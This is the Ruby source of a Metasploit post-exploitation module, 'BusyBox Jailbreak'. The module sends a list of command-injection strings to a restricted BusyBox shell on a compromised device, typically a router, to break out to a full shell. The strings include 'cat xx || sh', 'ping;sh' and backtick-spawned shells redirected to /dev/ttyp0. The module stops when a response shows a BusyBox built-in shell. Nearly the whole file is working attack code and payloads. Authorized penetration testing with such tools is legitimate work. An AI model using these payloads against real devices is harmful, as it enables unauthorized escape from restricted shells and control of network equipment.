metasploit-framework/modules/post/linux/busybox/jailbreak.rb

69 lines
1.7 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
METHODS = [
'cat xx || sh',
'ping || sh',
'echo `sh >> /dev/ttyp0`',
'ping `sh >> /dev/ttyp0`',
'cat `sh >> /dev/ttyp0`',
'cat xx;sh',
'echo xx;sh',
'ping;sh',
'cat xx | sh',
'ping | sh',
'cat ($sh)',
'cat xx &amp;&amp; sh',
'echo xx &amp;&amp; sh',
'ping &amp;&amp; sh'
]
def initialize
super(
'Name' => 'BusyBox Jailbreak ',
'Description' => %q{
This module will send a set of commands to a open session that is connected to a
BusyBox limited shell (i.e. a router limited shell). It will try different known
tricks to jailbreak the limited shell and get a full BusyBox shell.
},
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
end
def run
res = false
METHODS.each do |m|
res = try_method(m)
break if res
end
print_error('Unable to jailbreak device shell') unless res
end
def try_method(command)
vprint_status("jailbreak sent: #{command}")
session.shell_write("#{command}\n")
(1..10).each do
resp = session.shell_read
vprint_status("jailbreak received: #{resp}") unless resp.nil? || resp.empty?
if resp.downcase.include?('busybox') && resp.downcase.include?('built-in shell')
print_good("Jailbreak accomplished with #{command}")
return true
end
end
false
end
end